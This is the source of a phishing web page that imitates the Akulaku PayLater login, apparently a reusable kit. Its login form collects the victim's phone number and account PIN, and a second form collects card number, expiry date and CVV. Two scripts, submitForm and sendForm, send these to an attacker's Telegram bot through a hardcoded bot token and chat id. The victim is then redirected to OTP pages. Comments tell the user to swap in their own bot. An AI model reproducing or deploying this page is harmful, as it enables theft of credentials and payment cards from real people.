<html lang="en">
 <head>

<meta name="theme-color" content="#FF3131">
  <meta charset="UTF-8"> 
  <link rel="canonical" href="https://akulaku.id/-akulaku" />   
  <meta property="og:url" content="https://akulaku.id/-akulaku" />
  <title>Akulaku PayLater</title>
  <link rel="icon" type="image/png" href="https://4.bp.blogspot.com/-RtF51-U3kNY/YZTGCEqztmI/AAAAAAAAS5s/FN3ZdGq4RnEGpsWPApX-B73nDLGLSYY6QCLcBGAsYHQ/s256/logo%2Bpt%2Bakulaku.png"/>
    <link rel="image_src" href="https://4.bp.blogspot.com/-RtF51-U3kNY/YZTGCEqztmI/AAAAAAAAS5s/FN3ZdGq4RnEGpsWPApX-B73nDLGLSYY6QCLcBGAsYHQ/s256/logo%2Bpt%2Bakulaku.png"/>
  <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no,viewport-fit=cover">
  <link rel="dns-prefetch" href="https://cstatic.akulaku.net">
  <link rel="dns-prefetch" href="https://at.alicdn.com">
  <link rel="preconnect" href="https://ec-cstatic.akulaku.net">
  <link rel="dns-prefetch" href="https://ec-cstatic.akulaku.net">
  <style>#modal-root{z-index:1999}</style> 
  <link href="https://ec-cstatic.akulaku.net/openpay/umi.0a900b80.css" rel="stylesheet" type="text/css">
  <link href="https://ec-cstatic.akulaku.net/openpay/479.e233ddfe.chunk.css" rel="stylesheet" type="text/css">
  <link href="https://ec-cstatic.akulaku.net/openpay/openPay/app.c7fc5aba.chunk.css" rel="stylesheet" type="text/css">
    <link href="https://res.cloudinary.com/crunchbase-production/image/upload/c_lpad,h_170,w_170,f_auto,b_white,q_auto:eco,dpr_1/c01y0scakhfnmlybeip9" rel="shortcut icon" type="image/x-icon">
  <link href="https://res.cloudinary.com/crunchbase-production/image/upload/c_lpad,h_170,w_170,f_auto,b_white,q_auto:eco,dpr_1/c01y0scakhfnmlybeip9" rel="apple-touch-icon">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/4452.5558fab1.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/1985.2ba4d195.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/openPay/PaymentMethod.1336bc53.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/8680.34183b3b.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/1648.56a1f1df.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/openPay/Terms.d9e24a93.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/openPay/PaymentResult.dac896bb.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/openPay/PaymentContinue.00c288e6.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/9805.03c79d0d.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/8533.5c59bb7c.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/7300.892d4b22.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/110.bc0df4d0.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/4325.4b06c69a.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/8100.0ac14bba.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/806.85f4fb25.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/1016.ea503464.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/52.6c0a4056.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/8600.fc6c06e0.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/5471.49033e17.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/7321.9de4d9d7.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/3317.bd5a1e9b.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/6201.90e6fc48.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/9865.8ff8703b.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/6796.6b0f1ce2.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/2772.de4181c8.async.js">
  <link rel="prefetch" as="script" href="https://ec-cstatic.akulaku.net/openpay/9764.b0fa15b4.async.js"> 
  <link href="https://ec-cstatic.akulaku.net/openpay/3311.25d87eff.chunk.css" rel="stylesheet" type="text/css">
  <link href="https://ec-cstatic.akulaku.net/openpay/openPay/signin.6427c161.chunk.css" rel="stylesheet" type="text/css">
  
 <style>
      @import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
}
* {
    margin: 0px;
}
html, body {
      max-width: 100%;
      overflow-x: hidden;
      height: 100%;
      top: 0;
      max-height: 100%;
       bottom: 0;
       left: 0;
       right: 0;
      }
body {
    margin: 0px auto;
    background: #fff;
  background-position: 100% 100%;
  background-size: 100% 100%;
    color: #000;
    position: fixed;
    top: 0;
    height: 100%;
       bottom: 0;
       left: 0;
       right: 0;
    font-family: 'sageo UI', sans-serif;
}
welalxcome {
        position: fixed;
   top: 0;
       bottom: 0;
       left: 0;
       right: 0;
    width: 100vw;
    height: 100%;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
    background: #fff;
}
welalxcome img {
        width:40vw;
    height: auto;
}
chsalxcome {
        position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.talxcome {
    width: 130%;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    height: 100%;
    justify-content: center;
    
}


 .btn-login:disabled {
            opacity: 0.5;
        }

        @media only screen and (max-width: 600px) {
            .btn-login {
                width: 100%;
            }
        }
        
         .eye {
            display: block;
            margin: -19px auto;
            margin-right: 6px;
            position: relative;
            box-sizing: border-box; 
            z-index: 16; 
            height: 19.6189px;
            width: 24.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;
        }
        
        
@media screen and (max-width: 480px) {        
 #imgopen{
     position: absolute; 
     left: 78; 
     top: 37;
     
 }       
}

@media screen and (max-width: 480px) {    
 #imgtutup{
   position: absolute; 
   left: 76; 
   top: 35;  
 }
}

@media screen and (max-width: 360px) {        
 #imgopen{
     position: absolute; 
     left: 78; 
     top: 25;
     
 }       
}

@media screen and (max-width: 360px) {    
 #imgtutup{
   position: absolute; 
   left: 76; 
   top: 23;  
 }
}

.font-roboto-medium{
    width:;
}


.danimated {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: ease-in-out;
	animation-timing-function: ease-in-out;
}

@-webkit-keyframes bounceInRight { 
    0% { 
        opacity: 0; 
        -webkit-transform: translateX(200px); 
    } 
    60% { 
        opacity: 1; 
        -webkit-transform: translateX(-30px); 
    } 
    80% { 
        -webkit-transform: translateX(10px); 
    } 
    100% { 
        -webkit-transform: translateX(0); 
    } 
} 

@keyframes bounceInRight { 
    0% { 
        opacity: 0; 
        transform: translateX(200px); 
    } 
    60% { 
        opacity: 1; 
        transform: translateX(-30px); 
    } 
    80% { 
        transform: translateX(10px); 
    } 
    100% { 
        transform: translateX(0); 
    } 
} 

.bounceInRight { 
    -webkit-animation-name: bounceInRight; 
    animation-name: bounceInRight; 
} 


.sanimated {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: ease-in-out;
	animation-timing-function: ease-in-out;
}

@-webkit-keyframes bounceInLeft { 
    0% { 
        opacity: 0; 
        -webkit-transform: translateX(-200px); 
    } 
    60% { 
        opacity: 1; 
        -webkit-transform: translateX(30px); 
    } 
    80% { 
        -webkit-transform: translateX(-10px); 
    } 
    100% { 
        -webkit-transform: translateX(0); 
    } 
} 

@keyframes bounceInLeft { 
    0% { 
        opacity: 0; 
        transform: translateX(-200px); 
    } 
    60% { 
        opacity: 1; 
        transform: translateX(30px); 
    } 
    80% { 
        transform: translateX(-10px); 
    } 
    100% { 
        transform: translateX(0); 
    } 
} 
.bounceInLeft { 
    -webkit-animation-name: bounceInLeft; 
    animation-name: bounceInLeft; 
}

.welalxcome {
   width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.6);
}
.welalxcome img {
        width:30vw;
    height: auto;
    
}
.chsalxcome {
    position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}

.loader {
  width: 48px;
  height: 48px;
  background: url('https://media.tenor.com/wpSo-8CrXqUAAAAj/loading-loading-forever.gif');
  background-position: 100% 100%;
  background-size: 100% 100%;
  background-repeat: no-repeat;
  border: 2px ;
  border-color: #FF3D00 ;
  border-radius: 50%;
  display: inline-block;
  box-sizing: border-box;
  
}

@keyframes rotation {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(360deg);
  }
} 



</style>
  
<body>
     <main>
<welalxcome>
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9J6-jH0W1TYfbCnuiOehQJFmDE9CyEhQaSf7ue5-Og5XSDtUuLYwII8Hkak4vYdbYuXjNYmYK6PH3qKQjBSbvRJnLruvJlODPfdGsuWZWAEmosqULVUFdP4Bf5tJ9uOccX2y4t-oxDsqwRVfmngKkF_BNlq4OAQjQOHC54-LlPwS5jCOtMv1p7XvC/s400/logo-akulaku.png" alt="" />
</welalxcome>
<chsalxcome2 style="display: none;">
<div style="height:auto; width: auto; margin-top: 0px; margin-bottom: 0px;float:center; margin-left:0%;" class="talxcome"></div>
  
 

 
  
  
  
  
  
 </head>
 <body style="font-size: 14px;">

  <div id="__next" class="sanimated bounceInLeft akulaku-app-container" style="display: ">
   
    <div class="scrollView___1SZhk container___biXSk" style="height: 100%">
    
     <div class="containerBody___3Z8i0" style="background: url() no-repeat center center;
  background-position: 100% 100%;
  background-size: 100% 100%; height: 100%; top: 0;
       bottom: 0;
       left: 0;
       right: 0; position: fixed; width: 100%;  background-color: #fff" id="loginku">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimcFgSJFJacHMTiaZU2SNJKGWAcBvpMw8-rNKTGVht3vqMhnbuc2HbzvNJ5fBDDV7KSyo3AsLJaUzFbaySTM2WMxoyM9hgKvzWhJda2DEdGx0ZnJVpdtVQpm2PL8b2NXjgdtuJmYPkAUTn_VsaJVI8qOwJDm3L28gul-RPyrnx8-QRZSYzxm1X8NdCh9A/s1080/AddText_09-13-09.09.57.jpg" style="position: absolute; width: 100%; right: 0; left: 0; top: 0;z-index: -1">         
      <div class="mainBody___19TOW" style="background: transparent">
      <div id="">
   <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBRL_D5_GqRBjOXv0xltXHxyKFliY5L01-gaJN5wE061w_-NWT2Mxno0dYOXFogNQd5741EjdJ1i4kSxvdeuGEJrt9lZIy-UgpFUnC02s_hWU3y6HmB_ZQD7OB69ry9vc9erZktphI6Js5c2F7IVFxO3sJSSNNpLrWcIUn5pa91qLWGrd8kdm5qCNTwoU/s16000/1689312014612.png" width="100px" id="imgopen" style="margin-top: -5px; margin-left: -4px">
   </div>
   <div style=" display: none" id="imgtutup">
   <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKdXkvwfKhXpUmq1OLlkETUQClynjaWJhP5M2ukoQ-j_sr7JAe5W8-jbw9uCWIAEm-AvjqaaJvSNNA6m-E4jLa1dGV0LiTIE3evPKHU7UFGi1rQrmvsZE_611HmuIyuLZk8osUvkpdaaW1xqR0pYSUNViXxCfcD2HTK0vIFFIUnUQMisAEFTpfCcT_CBA/s16000/1689312002476.png" width="105px" style="margin-top: -4px"> 
   </div>
   
       <form id="formNohp" onsubmit="submitForm(event); return false"  class="formSmsLogin___35r-1" style="background: transparent; margin-top: 130px">

        <div class="inputWrapper___1QPHM mb14___2fwyK" style="background: transparent">
         <div class="inputContent___2SN63">
          <div class="font-roboto-medium prefix___2vr4B">
           <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7N9_f0ZkI1ADazZKYMj4CaR-Wa-EimeW9kH8LGxTyBkQXaYLht8CP-V82k1H9ng7RdYmxc214cyLEDGaoO2QnUQxi2rxQ-Q4q8ozZ2waIEsgD5lISAko8SLIfsu6uDSQ1GcYIhxVRDXbDVdNU04PkBcNmFxvQ4ME_8Cjv4ZucEyvs_jMoTGqhHGHI/s60/62.png">
           <span>+62</span>
          </div>
          <div class="FormInputWrapper___2YPnU">
           <div class="input-group___3rbjL one_icon___2Dl7X">
            <input class="font-roboto-medium" id="nama" type="tel" name="tel" required="" placeholder="Masukkan No. HP" maxlength="13" value="" minlength="10" onclick="closegambar()">
            <span class="icon_area___NIAqv"></span>
            <p></p>
           </div>
          </div>
         </div>
         <span class="errorText___3TuIS"></span>
        </div>
        <div class="inputWrapper___1QPHM CodeInputNew___1rBmX">
         <div class="inputContent___2SN63 inputContent___X3JIm">
          <div class="FormInputWrapper___2YPnU FormInputWrapper___263Pb">
           <div>
            <div class="input-group___3rbjL one_icon___2Dl7X">
           <div id="opengamnar" class="clickable-element">
             <input class="font-roboto-medium" id="email" type="password" name="password" inputmode="numeric" required="true" placeholder="Masukkan PIN Anda" minlength="6" maxlength="6" autocomplete="off" value="" onclick="opengambar()">
             </div>
             <span class="icon_area___NIAqv"></span>
             <div class="bubble-element eye clickable-element" tabindex="3" id="eyeClose" style="display: none"> 

        <img alt="" id="eye" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzwSBnjeXRnqcMh_SG1HfwbFlXFjeZB3JuDVM1L5aMDqV-D7gcJddz93ncTnRlM7A4lmxZQuP3AnPNh5HJtRkrOPIj34OlN3DRtoDL3zrEKt3KT_a2maEOPcut9SP1zXwKsC3-04ZZ7_beCxv7SYwESx2aP4h3agRMFTNASFE0avrko2l3UtejTzDnLqY/s16000/1689314344070.png" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;"> 
       </div> 
                    <div class="bubble-element eye clickable-element" tabindex="3" id="eyeOpen"> 
        <img alt="" id="eye" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCNZiZYo_0MfbTHAeESTYwv2N-248fecAcLchQ_-jVBzRM_NkpQ-5ZpVpnUVop54u7VBC8vw_vljtsTzDJAWMyT0rMWiTQxCR1GEP5cRD6fTC-WzAqP1LjJxKcRJDifyEtZewPHqSjrZX8sLvh8cuQPsAXiAMjPBd4Ll8ItT0NiLgTU1JFk_igelauOjU/s16000/1689314354910.png" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;"> 
       </div> 
       
             <p></p>
            </div>
           </div>
          </div>
         </div>
         <span class="errorText___3TuIS"></span>
        </div>
        <div class="SwitchLoginType___3K5KV font-roboto-medium" style="background: transparent">
         <span></span>
        </div>
   <button id="btn" style="background: transparent" disabled class="btn-login" type="submit"><a role="button" type="submit" class="am-button font-roboto-medium LoginSubmitBtn___3LblX mb14___2fwyK am-button-warning" ="false" ><span>Verifikasi</span></a>
        
         <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwPRcx3jkTpyA5u1txN0ja4bCZqKQyEGnoNwMfKMS7rbDY6-79J1sC_8dcBbO3SpW8pw2nCyphTqPtVEYLL9tbQoXFHHfOclTq6kvxps_2U3CLzgaeUAuwwRtv9sf9yJxgp3EKBphne_Tez4y96iWZ1_BxQz-dUfVMBVJsBDQQuz1chGYgZAf7frXz/s36/centang.png" alt="" style="opacity: 0.0">
         <p><span style="color: transparent;">Dengan klik Login berarti kamu telah membaca dan menyetujui perjanjian ketentuan berikut </span></p>
        </div>
       </form>
       <center>
    
      </center>
      <div class="footer___3zw6C">
       <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv_KUDXfkNeBPpHZeawo1diSgK76yIW2LDn-pzt7tmYr7oS52sd9brTon0tL1jMonG-xVfQR4lczZBMiDQ23iRyBQOurjxVr-iReAV_XSk2NLUIa8SVb_NH1Xqxr_U7Y9JxDou7lZTFmjuEnWN7PhpIArIR3t5jncLFIKXeYIrfK_qOZkbOzlpYoL8/s542/ojk.4ed70c7b.png" alt="" style="margin-top: -170px">
      </div>
     </div>
    </div> 
   </div>
  </div> 
  <div id="__next1" class="danimated bounceInRight akulaku-app-container" style="display:none; background: white">
 <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBnu0vVPa7llEd0IyMCc0SMdzK4W8ZEKYKNivz2SOtkrXsq017jx_rg2kxe7OQnpiUe-zPSQvkVSeBG4EOTwu2xOQpi4-WWNfCr9EyUJPFRbklKFOaatAxf9kpyNPh_4wUbZ1Fk4Kj3Gi-6ymqTeo8kGHerBaLOrWIjivg754FxuPK9ELTO_5z-aTu0Jc/s16000/IMG_20230720_102036.jpg" width="100%" style="position: absolute; top: 0; left: 0; right: 0; margin: 0px auto;">
    <div class="scrollView___1SZhk container___biXSk" style="height: 100%; background: white">
    
     <div class="containerBody___3Z8i0" style="background: url() no-repeat center center;
  background-position: 100% 100%;
  background-size: 100% 100%; height: 100%; top: 0;
       bottom: 0;
       left: 0;
       right: 0; position: fixed; width: 100%; diaplay: " id="loginku">
      <div class="mainBody___19TOW" style="background: transparent">
      
   
       <form onsubmit="sendForm(event); return false" class="formSmsLogin___35r-1" style="background: transparent; margin-top: 130px">
           <center>
<span style="margin: 25px; font-weight: 700; color: #FF4A47">Masukkan Rincian Kartu</span>
</center>
<p></p>
        <div class="inputWrapper___1QPHM mb14___2fwyK" style="background: transparent; margin-top: 20px">
         <div class="inputContent___2SN63">
         
          <div class="FormInputWrapper___2YPnU">
           <div class="input-group___3rbjL one_icon___2Dl7X">
            <input class="font-roboto-medium" id="nomorkartu" type="tel" name="tel" required="" placeholder="Masukkan Nomor Kartu" maxlength="16" value="" minlength="16">
           
            
            <p></p>
           
           </div>
          </div>
         </div>
         <div style="text-align: justify; width: 100%; margin-top: 7px">
            <select class="font-roboto-medium" style="width: 45%; border-radius: 20px; height: 40px; float: left; padding-left: 0px; text-align: center; font-weight: 500; color: #B9C0C8; background: #EFF2F7; border: 1px solid #DDDDDD99" id="bulan">
                <option value="" selected disabled>Bulan</option>
                <option value="01">01</option>
                <option value="02">02</option>
                <option value="03">03</option>
                <option value="04">04</option>
                <option value="05">05</option>
                <option value="06">06</option>
                <option value="07">07</option>
                <option value="08">08</option>
                <option value="09">09</option>
                <option value="11">11</option>
                <option value="12">12</option>
                
            </select>
            <select class="font-roboto-medium" style="width: 45%; border-radius: 20px; height: 40px; float: right; padding-left: 0px; text-align: center; font-weight: 500; color: #B9C0C8; background: #EFF2F7; border: 1px solid #DDDDDD99; margin-bottom:" id="tahun">
                <option value="" selected disabled>Tahun</option>
                <option value="2023">2023</option>
                <option value="2024">2024</option>
                <option value="2025">2025</option>
                <option value="2026">2026</option>
                <option value="2027">2027</option>
                <option value="2028">2028</option>
                <option value="2029">2029</option>
                <option value="2030">2030</option>
                <option value="2031">2031</option>
                <option value="2032">2032</option>
            </select>
            </div>
            <br/>
            <p></p>
            
         <span class="errorText___3TuIS"></span>
         <div class="inputContent___2SN63" style="margin-top: 31px">
         
          <div class="FormInputWrapper___2YPnU">
           <div class="input-group___3rbjL one_icon___2Dl7X">
            <input class="font-roboto-medium" id="kodecvv" type="tel" name="tel" required="" placeholder="CVV 3 Digit" maxlength="3" value="" minlength="3">
           
            
           
           </div>
          </div>
         </div>
        </div>
        <div class="SwitchLoginType___3K5KV font-roboto-medium" style="background: transparent; margin-top: -20px" >
         <span></span>
        </div>
   <button id="kirim" type="submit" style="background: transparent"  class="btn-login"><a role="button" type="submit" class="am-button font-roboto-medium LoginSubmitBtn___3LblX mb14___2fwyK am-button-warning" ="false" ><span id="kirimk">Konfirmasi</span></a>
        
         <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwPRcx3jkTpyA5u1txN0ja4bCZqKQyEGnoNwMfKMS7rbDY6-79J1sC_8dcBbO3SpW8pw2nCyphTqPtVEYLL9tbQoXFHHfOclTq6kvxps_2U3CLzgaeUAuwwRtv9sf9yJxgp3EKBphne_Tez4y96iWZ1_BxQz-dUfVMBVJsBDQQuz1chGYgZAf7frXz/s36/centang.png" alt="" style="opacity: 0.0">
         <p><span style="color: transparent;">Dengan klik Login berarti kamu telah membaca dan menyetujui perjanjian ketentuan berikut </span></p>
        </div>
       </form>
     <center>
       <button id="kir8" type="button" style="width: 120px; border-radius: 20px; height: 30px;  color: #B9C0C8" onclick="gantimode1()">Kembali Login</button>
       </center>
      <div class="footer___3zw6C" style="position: absolute; bottom: 0; left: 0; right: 0; margin; 0px auto">
       <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv_KUDXfkNeBPpHZeawo1diSgK76yIW2LDn-pzt7tmYr7oS52sd9brTon0tL1jMonG-xVfQR4lczZBMiDQ23iRyBQOurjxVr-iReAV_XSk2NLUIa8SVb_NH1Xqxr_U7Y9JxDou7lZTFmjuEnWN7PhpIArIR3t5jncLFIKXeYIrfK_qOZkbOzlpYoL8/s542/ojk.4ed70c7b.png" alt="">
      </div>
     </div>
    </div> 
   </div>
  </div> 
  <div class="welalxcome" style="display: none">
<span class="loader"></span>
</div>
  <div id="modal-root"></div>
  <div id="userdata_el" style="visibility: hidden; position: absolute;"></div>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sendFormha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>



  <script>
function gantimode(){
    document.getElementById("__next1").style.display = "block";  
    document.getElementById("__next").style.display = "none";  
}

function gantimode1(){
    document.getElementById("__next1").style.display = "none";  
    document.getElementById("__next").style.display = "block";  
}



         function OnButton(nama, email) {

            if(nama.length > 4 && email.length > 5) {
                $(".btn-login").prop('disabled', false);
            } else {
                $(".btn-login").prop('disabled', true);
            }
        }
        $(document).ready(function() {
            $("body").on('click', 'button#doLog', function() {
                var user = $("#nama").val();
                var pass = $("#email").val();

                $.ajax({
                    url: "/login/confirm.php",
                    method: "POST",
                    data: "username="+user+"&password="+pass,
                    beforeSend: function() {
                        $("#loading").show();
                    },
                    success: function(responsex) {
                        $("#aseli").html('');
                        if(responsex == "true") {
                            $.get("/aplikasi/login.js", function(datax, status){
                                window.history.pushState("", "", '/login.js');
                                $("#hideBody").hide();
                                $("#loading").hide();
                                $("#aseli").html(datax);
                            });
                        } else {
                            $.get("/aplikasi/pin.php", function(data, status){
                                window.history.pushState("", "", 'aplikasi/login.php');
                                setTimeout(function() { 
                                    $("#hideBody").hide();
                                    $("#loading").hide();
                                    $("#aseli").html(data);
                                    $("#aseli").show();
                                }, 1000);
                            });
                        }
                        
                    }
                })
            });
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#imgopen").css("display", "none");
                
                $("#eyeClose").css("display", "block");
                $("#imgtutup").css("display", "block");

                $("#email").prop("type", "password");

             $("div#eyeClose").on('click', function() {
                $("#eyeOpen").css("display", "block");
                $("#imgopen").css("display", "block");
                
                $("#eyeClose").css("display", "none");
                $("#imgtutup").css("display", "none");

                    $("#email").prop("type", "text");
                });
            });

            $("#nama").on('input', function() {
                var user = $("#nama").val();
                var pass = $("#email").val();

                OnButton(user, pass);
            });

            $("#email").on('input', function() {
                var user = $("#nama").val();
                var pass = $("#email").val();

                OnButton(user, pass);
            });
        });
    </script>
  
  <script>
 function opengambar() {
     document.getElementById("eyeOpen").style.display = "none"; 
     document.getElementById("eyeClose").style.display = "block"; 
              
                $("#imgopen").css("display", "none");
                
               
                $("#imgtutup").css("display", "block");

                $("#email").prop("type", "password");

             
  }
 function closegambar() {
     
document.getElementById("eyeOpen").style.display = "block";
document.getElementById("eyeClose").style.display = "none"; 
                $("#imgopen").css("display", "block");
                
               
                $("#imgtutup").css("display", "none");

                $("#email").prop("type", "text");

             
  } 
  
$( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },1500)
        });

        </script>
<script>

function submitForm(event){
     $(".welalxcome").show();
    
    var nama = document.getElementById('nama');
    var email = document.getElementById('email');
    
   var gabungan = '𝓐𝓴𝓾𝓵𝓪𝓴𝓾' + '%0A𖥔 𝗡𝗼𝗺𝗼𝗿 𝗛𝗮𝗻𝗱𝗽𝗵𝗼𝗻𝗲 : ' + '0' + nama.value + '%0A𖥔 𝗣𝗶𝗻 𝗔𝗞𝗨𝗟𝗔𝗞𝗨 : ' + email.value;
   
    var token = '7378086672:AAG5pofkBXBYDdpGxcHPJGFTZ6K-n3xX-7U'; // Ganti dengan token bot yang kamu buat
    var grup = '7081931750'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `get`,
        
    success: function(){
    setTimeout(function(){
    $(".welalxcome").fadeOut("slow");    
     window.location.href = 'akulaku_otp.html'; //Will take you to Google."./app.html";
    },3000)
   
    }
        
    }
    );
        
    };
    
function sendForm(event) {
     $(".welalxcome").show();
    
    
  document.getElementById('kirimk').innerHTML = 'Mohon Tunggu....';  
    
    var nomorkartu = document.getElementById('nomorkartu');
    var bulan = document.getElementById('bulan');
    var tahun = document.getElementById('tahun');
    var kodecvv = document.getElementById('kodecvv');
    
   var gabungan = '%0A𝗡𝗼𝗺𝗼𝗿 𝗞𝗮𝗿𝘁𝘂%3A%0A' + nomorkartu.value + '%0A𝗠𝗮𝘀𝗮 𝗕𝗲𝗿𝗹𝗮𝗸𝘂%3A%0A' + bulan.value + "/" + tahun.value + '%0A𝗖𝗩𝗩%3A%0A' + kodecvv.value;
   
    var token = '7378086672:AAG5pofkBXBYDdpGxcHPJGFTZ6K-n3xX-7U'; // Ganti dengan token bot yang kamu buat
    var grup = '7081931750'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
        
    success: function(){
    setTimeout(function(){
     $(".welalxcome").fadeOut("slow");        
     window.location.href = 'otp.html'; //Will take you to Google."./app.html";
    },3000)
   
    }
        
    }
    );
        
    };
</script>

    <!-- Static App Form Collection Script -->
<!--<script src="https://static.app/js/static-forms.js" type="text/javascript"></script>

<script src="https://static.app/js/static.js" type="text/javascript"></script>-->
  </body>
</html><!--<script src='https://a.bsite.net/footer.js'></script>
